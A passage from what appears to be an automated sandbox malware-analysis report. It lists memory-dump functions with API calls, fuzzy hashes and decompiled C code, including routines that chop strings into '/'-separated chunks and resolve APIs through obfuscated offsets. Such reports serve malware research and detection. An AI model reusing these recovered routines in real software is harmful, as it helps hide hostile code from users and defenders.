                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction ID: bd4805fce96bbe2cfd29895ea3203faea78ddc504dfd8c8a12b470b951a0bd0d
                                                                                                                                  • Opcode Fuzzy Hash: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction Fuzzy Hash: 48212AB1D0024CEFCB05CFD8C950BDDBBB9BF49318F108969E819AB694DB346A05CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction ID: db557a30f8cc965092d4e6c18c08b6e3dd7fccf8fc736e3744d96081085fa78a
                                                                                                                                  • Opcode Fuzzy Hash: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction Fuzzy Hash: AA214AB1D0024CEFCB05CFD8C840BDEBBB9BF49318F008969E819AB694DB306A05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A326DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00A326DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xa3d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xa3d288; // 0x7370bc02
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xa3d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                  0x00a326e5
                                                                                                                                  0x00a326e8
                                                                                                                                  0x00a326ee
                                                                                                                                  0x00a32706
                                                                                                                                  0x00a32708
                                                                                                                                  0x00a3270d
                                                                                                                                  0x00a3270f
                                                                                                                                  0x00a32712
                                                                                                                                  0x00a32714
                                                                                                                                  0x00a32717
                                                                                                                                  0x00a32719
                                                                                                                                  0x00a32719
                                                                                                                                  0x00a3271b
                                                                                                                                  0x00a32726
                                                                                                                                  0x00a3272b
                                                                                                                                  0x00a3273c
                                                                                                                                  0x00a32744
                                                                                                                                  0x00a32749
                                                                                                                                  0x00a3274c
                                                                                                                                  0x00a3274f
                                                                                                                                  0x00a32751
                                                                                                                                  0x00a32754
                                                                                                                                  0x00a32757
                                                                                                                                  0x00a32757
                                                                                                                                  0x00a3275a
                                                                                                                                  0x00a32765
                                                                                                                                  0x00a3276a
                                                                                                                                  0x00a32774

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A31A07,00000000,?,?,00A34653,?,033A95B0), ref: 00A326E8
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A32700
                                                                                                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A31A07,00000000,?,?,00A34653,?,033A95B0), ref: 00A32744
                                                                                                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00A32765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1819133394-0
                                                                                                                                  • Opcode ID: 6817d391013c180bf5b5281f50a0b7756269eac90ff477e2fb82b5ae98c66dab
                                                                                                                                  • Instruction ID: d3a9a6517de75a0d1d91a4ade0b5776370acc1db8b6d2620f08386a86bb47720
                                                                                                                                  • Opcode Fuzzy Hash: 6817d391013c180bf5b5281f50a0b7756269eac90ff477e2fb82b5ae98c66dab
                                                                                                                                  • Instruction Fuzzy Hash: E811E972A00214BFC714CBA9ED84E9EBBBEEBC1360F150276F905D7151E6709E059760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35AB2, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00A35AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E00A31A9C(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xa3d2e0; // 0x296a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0xa3e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0xa3e8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00A334C7();
					_push( &_v64);
					if( *0xa3d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00A334C7();
				}
				return _t28;
			}














                                                                                                                                  0x00a35ab2
                                                                                                                                  0x00a35ab9
                                                                                                                                  0x00a35ac7
                                                                                                                                  0x00a35acb
                                                                                                                                  0x00a35ad5
                                                                                                                                  0x00a35ada
                                                                                                                                  0x00a35adf
                                                                                                                                  0x00a35ae4
                                                                                                                                  0x00a35aee
                                                                                                                                  0x00a35af8
                                                                                                                                  0x00a35af8
                                                                                                                                  0x00a35af0
                                                                                                                                  0x00a35af0
                                                                                                                                  0x00a35af0
                                                                                                                                  0x00a35af0
                                                                                                                                  0x00a35afe
                                                                                                                                  0x00a35b04
                                                                                                                                  0x00a35b05
                                                                                                                                  0x00a35b08
                                                                                                                                  0x00a35b0b
                                                                                                                                  0x00a35b0e
                                                                                                                                  0x00a35b16
                                                                                                                                  0x00a35b1f
                                                                                                                                  0x00a35b27
                                                                                                                                  0x00a35b27
                                                                                                                                  0x00a35b29
                                                                                                                                  0x00a35b2b
                                                                                                                                  0x00a35b2b
                                                                                                                                  0x00a35b35

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(00000000), ref: 00A31AF6
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(0070006F), ref: 00A31B0A
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(00000000), ref: 00A31B1C
                                                                                                                                  • memset.NTDLL ref: 00A35AD5
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A35B21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$ErrorLastmemset
                                                                                                                                  • String ID: <$@MtNt
                                                                                                                                  • API String ID: 3736384471-2823972799
                                                                                                                                  • Opcode ID: 2667dcc55ebbc87f551e66535917fb9ac11c7744cc92b8a858fbb9373efca38c
                                                                                                                                  • Instruction ID: ce07f0ca35595468d31d2249e133ec00c47b23379f9eed37a08cc39c3d9b95a2
                                                                                                                                  • Opcode Fuzzy Hash: 2667dcc55ebbc87f551e66535917fb9ac11c7744cc92b8a858fbb9373efca38c
                                                                                                                                  • Instruction Fuzzy Hash: 88015E71D00618AFDB11EFE8ED85EDEBBB8AF08780F044526F908E7251E770D9018BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  • Opcode ID: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction ID: 84bc7622b8dd86b95011762930e5fef9f71cad178bb29a326bb75f629c6d9a3e
                                                                                                                                  • Opcode Fuzzy Hash: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction Fuzzy Hash: BD015BB1405B44DFC7208FAA848058AFAE4BF29254B908D6FE58987A01D730D545CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34450, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xa3d2a4; // 0x208
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xa3d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xa3d2a4; // 0x208
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa3d270; // 0x2fb0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                  0x00a34450
                                                                                                                                  0x00a34457
                                                                                                                                  0x00a344a1
                                                                                                                                  0x00a344a3
                                                                                                                                  0x00a344a3
                                                                                                                                  0x00a3445b
                                                                                                                                  0x00a34461
                                                                                                                                  0x00a34466
                                                                                                                                  0x00a3446a
                                                                                                                                  0x00a34470
                                                                                                                                  0x00a34477
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34479
                                                                                                                                  0x00a3447e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3447e
                                                                                                                                  0x00a34480
                                                                                                                                  0x00a34488
                                                                                                                                  0x00a3448b
                                                                                                                                  0x00a3448b
                                                                                                                                  0x00a34491
                                                                                                                                  0x00a34498
                                                                                                                                  0x00a3449b
                                                                                                                                  0x00a3449b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(00000208,00000001,00A3191C), ref: 00A3445B
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00A3446A
                                                                                                                                  • CloseHandle.KERNEL32(00000208), ref: 00A3448B
                                                                                                                                  • HeapDestroy.KERNEL32(02FB0000), ref: 00A3449B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4109453060-0
                                                                                                                                  • Opcode ID: 81031d92dc8aff7099652bcc4963c58ee41eb4dbb100083868efd3670c5704df
                                                                                                                                  • Instruction ID: f8b9397d412f0b79c35ffb3763cf4196198fdae943e33f843d1a17b14992c1f4
                                                                                                                                  • Opcode Fuzzy Hash: 81031d92dc8aff7099652bcc4963c58ee41eb4dbb100083868efd3670c5704df
                                                                                                                                  • Instruction Fuzzy Hash: CFF0C076B01352DBDF24DBF5FD88B4736ACEB09771F054520B815E75A0DB24E8468A60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
                                                                                                                                  • Opcode ID: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction ID: 39835b0edfa9c604f16208a467f4e7223842532e9d05214564326cd04fe60ae8
                                                                                                                                  • Opcode Fuzzy Hash: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction Fuzzy Hash: 57C1C2319042369ADB649FE4CC50BEA73BDFF65718F3045AAD80697284EB31DA81CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E927A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction ID: bf31e69305876a649dd19c868a5efa82f2a87730dfe5c88523ab3639ef6db876
                                                                                                                                  • Opcode Fuzzy Hash: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction Fuzzy Hash: AF517961A2C102DEDF81B6E4C9503AB7BACDF41750F304D79F8A1922DCEB32C4919E86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1AD7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1AD7(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x6e8d41b0;
				_t19 = 0x104;
				_t23 = E6E8D1000(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E6E8D1397(_t23);
					_t23 = E6E8D1000(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E6E8D1397(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                                                                                                                                  0x6e8d1ae8
                                                                                                                                  0x6e8d1aeb
                                                                                                                                  0x6e8d1af5
                                                                                                                                  0x6e8d1af9
                                                                                                                                  0x6e8d1b4e
                                                                                                                                  0x6e8d1b50
                                                                                                                                  0x6e8d1b51
                                                                                                                                  0x6e8d1b56
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1afb
                                                                                                                                  0x6e8d1afb
                                                                                                                                  0x6e8d1b00
                                                                                                                                  0x6e8d1b06
                                                                                                                                  0x6e8d1b0b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1b12
                                                                                                                                  0x6e8d1b18
                                                                                                                                  0x6e8d1b26
                                                                                                                                  0x6e8d1b2a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1b2a
                                                                                                                                  0x6e8d1b2c
                                                                                                                                  0x6e8d1b30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1b35
                                                                                                                                  0x6e8d1b45
                                                                                                                                  0x6e8d1b47
                                                                                                                                  0x6e8d1b37
                                                                                                                                  0x6e8d1b3a
                                                                                                                                  0x6e8d1b3a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,6E8D1668,?), ref: 6E8D1B00
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E8D1668,?), ref: 6E8D1B3E
                                                                                                                                    • Part of subcall function 6E8D1397: HeapFree.KERNEL32(00000000,?,6E8D1B4C,00000000,?,?,?,6E8D1668,?), ref: 6E8D13A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 1691993961-608512568
                                                                                                                                  • Opcode ID: fb2ad383cd86aec500801090b990194066a034b06d813e32bd8bc8f4fbbcd422
                                                                                                                                  • Instruction ID: 67ab2555c84f5ff2cca0159c9b0d8cfb84315480c168cb117b6b9842931a19a2
                                                                                                                                  • Opcode Fuzzy Hash: fb2ad383cd86aec500801090b990194066a034b06d813e32bd8bc8f4fbbcd422
                                                                                                                                  • Instruction Fuzzy Hash: 8001D472A40A1AABCB5197ED8C44D9F7EACDF86794B014922E90497280FB70CC4C87E0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3117A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E00A31922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E00A39371(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E00A34A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0xa3d270, 0, _t25);
				}
				return _t22;
			}










                                                                                                                                  0x00a3117a
                                                                                                                                  0x00a3118b
                                                                                                                                  0x00a3118f
                                                                                                                                  0x00a311ea
                                                                                                                                  0x00a31191
                                                                                                                                  0x00a31198
                                                                                                                                  0x00a311a0
                                                                                                                                  0x00a311a8
                                                                                                                                  0x00a311ac
                                                                                                                                  0x00a311b2
                                                                                                                                  0x00a311ba
                                                                                                                                  0x00a311bd
                                                                                                                                  0x00a311d5
                                                                                                                                  0x00a311d5
                                                                                                                                  0x00a311e0
                                                                                                                                  0x00a311e0
                                                                                                                                  0x00a311f1

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,033A9364), ref: 00A311B2
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,033A9364), ref: 00A311E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1500278894-8415677
                                                                                                                                  • Opcode ID: 6f151cb1257a29855bf7228dffc10df275fdd9ee62129c82dc695cfad18fd1c5
                                                                                                                                  • Instruction ID: 8243944e90222b1512eda0d91420cba0baa04cd0d5078f526623bca3f84ed309
                                                                                                                                  • Opcode Fuzzy Hash: 6f151cb1257a29855bf7228dffc10df275fdd9ee62129c82dc695cfad18fd1c5
                                                                                                                                  • Instruction Fuzzy Hash: E3018F36210209BBDB215FE5EC45EEF7B78FF89754F10042AFA40AA161DAB1D925C760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A327C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00A327C7(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0xa3d2d8;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0xa3d28c; // 0x20c
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0xa3d2e0; // 0x296a5a8
				_t3 = _t12 + 0xa3e0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0xa3d2e0; // 0x296a5a8
				_t4 = _t17 + 0xa3e9ea; // 0x6f577349
				 *0xa3d2ac = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0xa3d2d8 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}










                                                                                                                                  0x00a327cb
                                                                                                                                  0x00a327d0
                                                                                                                                  0x00a327d5
                                                                                                                                  0x00a327dd
                                                                                                                                  0x00a32813
                                                                                                                                  0x00a32815
                                                                                                                                  0x00a3281c
                                                                                                                                  0x00a32820
                                                                                                                                  0x00a32822
                                                                                                                                  0x00a32822
                                                                                                                                  0x00a32820
                                                                                                                                  0x00a32825
                                                                                                                                  0x00a3282a
                                                                                                                                  0x00a3282a
                                                                                                                                  0x00a327df
                                                                                                                                  0x00a327e4
                                                                                                                                  0x00a327eb
                                                                                                                                  0x00a327f1
                                                                                                                                  0x00a327f7
                                                                                                                                  0x00a327ff
                                                                                                                                  0x00a32804
                                                                                                                                  0x00a3280a
                                                                                                                                  0x00a32811
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,00A326C2,?,00000001,?,?,?,00A31900,?), ref: 00A327EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6F577349), ref: 00A32804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Nt
